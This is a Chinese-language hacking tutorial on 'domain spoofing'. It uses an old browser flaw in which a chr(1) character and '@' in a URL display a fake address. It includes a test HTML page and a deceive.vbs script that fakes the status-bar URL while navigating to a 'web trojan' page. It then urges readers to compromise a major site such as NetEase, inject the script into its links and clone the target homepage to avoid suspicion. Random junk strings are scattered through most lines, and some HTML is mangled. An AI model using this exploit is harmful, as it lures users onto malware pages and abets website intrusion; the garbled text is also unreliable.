域名欺骗技术实现过程

网页木马种植方案一直都存在很大的问题，当然欺骗需要技巧也需要时间，我们现在不需要那么麻烦的欺骗，本文就是教大家利用最新浏览器漏洞实现域名的欺骗..... .BD J=2  
vzu<!l<[  
A>1+Cg1a t  
　　前言 7?)eT
cet  
　　域名欺骗有多种实现方法，本文所说的是利用客户端浏览器的漏洞来欺骗用户。 sk
0~3*G3!  
APC{ImQL  
　　多数浏览器都会存在这个漏洞，目前暂时还没相应的补丁。漏洞是这样的： !'K)kp-  
当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的，那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url： qtrM_bj-  
wp 0^&={3}  
url的构造格式为： )DXAivp)b  
_1][special_char]@[url_2]/" target=_blank＞http://[url_1][special_char]@[url_2] H<t2[1f  
mf!896_  
说明：  |Uu[\P  
C(Ws57Z  
　　url_1为用户所看到的地址，地址中不可以带"/" <.b ,'6\ "  
　　special_char为一个特殊的字符，即ascii码为1的字符 ~.U+3u`R  
　　url_2为恶意页面地址 NT[/TQm  
xW rq]r m  
　　利用过程 z(jgBR  
seMK/MgN  
　　首先请看这个测试页面： &! [^,dM:  
I5s{?fD  
＜html＞ V vfu  
＜head＞ avmF4~`T/  
＜title＞域名欺骗技术实例＜/title＞ . ZYs-L_  
＜/head＞ baT7 (v#h  
＜body link="#0000ff" alink="#0000ff" vlink="#0000ff"＞ 2EQ5Z27a  
你可以看看这两个链接有什么区别:＜br＞ BwCgk^Rp  
＜h1＞链接1:＜script language="vbscript" src="deceive.vbs"＞＜/script＞＜/h1＞ 7V
OA/H\d  
＜h1＞链接2:＜a href="_blank ?＞www.163.com" target="_blank"http://www.163.com/"; target="_blank"http://ww ... ";＞www.163.com＜/a＞＜/h1＞ Jf~a[=pPV  
＜/body＞ 1vPP69\  
＜/html＞ 9]Dz?E5Ds  
7'fM>0z{VF  
　　这个网页源代码，其中链接1指向了一个vbs脚本，而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码： (WOl3'4c,  

I>b2%({  
''''''''''''''''''''''''''''''''''''''deceive.vbs''''''''''''''''''''''''''''''''''''''''''''' /{W)uw<&  
'（以下请根据实际情况自行修改：） gF>8]8LZ0  
url1="http://www.163.com/" [Dsf-ao(~  
url2="http://www.google.com/" /`g?&52  
text="http://www.163.com/" rXKw601m)  
url="_blank ?＞http://";&url1&chr(1)& ... p;url2&"" vrY7 TMu  
dn="/" d!Lwbb*t  
mouseover="onmouseover=""javascript :window.status='_blank ?＞http://";&url1&dn&"'""" h<G NlLh l  
mouseout="onmouseout=""javascript :window.status=''""" RD]ue&  
click="onclick=""javascript :navigate('"&url&"')""" sBc[O)  
style="style=""cursor:hand""" 1Nan"UB9  
tag="＜span "&style&" "&mouseover&" "&mouseout&" "&click&"＞＜font color=""#0000ff""＞＜u＞"&text&"＜/u＞＜/font＞＜/span＞" NiT AgIs  
document.write tag 9;0E$  
'说明： .'s~<^,3
 
'url1是用来欺骗用户的地址. p3g@xd
O  
'url2是实际访问的地址，可以是网页木马、恶意网页等. 0b OD! 1z  
'text是链接的文字. g:2y
f\-  
'注意：(以上欺骗地址及实际地址不可以加"http://") m$w_@(R-b3  
'''''''''''''''''''''''''''''''''''''''cuts here'''''''''''''''''''''''''''''''''''''''''''''''' \H5. )L  
D]T@%<VF  
　　现在大家看到了吧~~当我们点击这个测试页面的时候，链接1指向的是google.com，而且状态栏和地址栏里都显示"_blankhttp://www.163.com/"，链接2却指向163.com。你也许感到不可思议，但这就是域名欺骗漏洞的魅力。 <b|]X&A`;  
)I{e^t  
　　我们可以想象，如果以上的测试页面中的链接1指向的不是google.com，而是我们的网页木马，那就...... T|OXz&Z  
-6)/BS`!4r  
　　不过，一个普通的个人网站没人会看的，这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站，比如网易（哇~~~~~~这时候一只菜鸟推着一车砖头，看着我......）。这时候就可以把它的页面给改了。 'FxOw?vB5  
r!KpK<M  
　　比如有一个文字链接，我们就可以把代码中的"＜a href="xxxxx.htm"＞xxxxxx＜/a＞"改为我们自己的代码："＜script language="vbscript" src="deceive.vbs"＞＜/script＞"。看到src属性里的deceive.vbs了吗 ？我们要编辑好这个文件，然后上传到要修改的页面目录下。 4))<w,t  

FGpVMJ  
　　这样还不行，我们还要把自己的木马网页的界面修改一下。也就是把原来链接到的页面加入到我们自己的木马网页，并且我们的木马网页里的所有链接等内容要和原来的页面一样，否则就会引起用户的怀疑。现在，我们把google网站的首页源代码全部复制下来，添加到我们的网页木马。把复制下来的代码中的图片或者是链接的文件都修改完整，比如logo.gif改为_blank＞/UpLoadFiles/NewsPhoto/comalogo.gif，否则网页就和原来的不一样了（图片显示为红色的×，链接也失效），因为用户打开的是你的站点，而你的站点中并没有logo.gif。都修改好后就可以保存文件了。上传到你的网页空间里。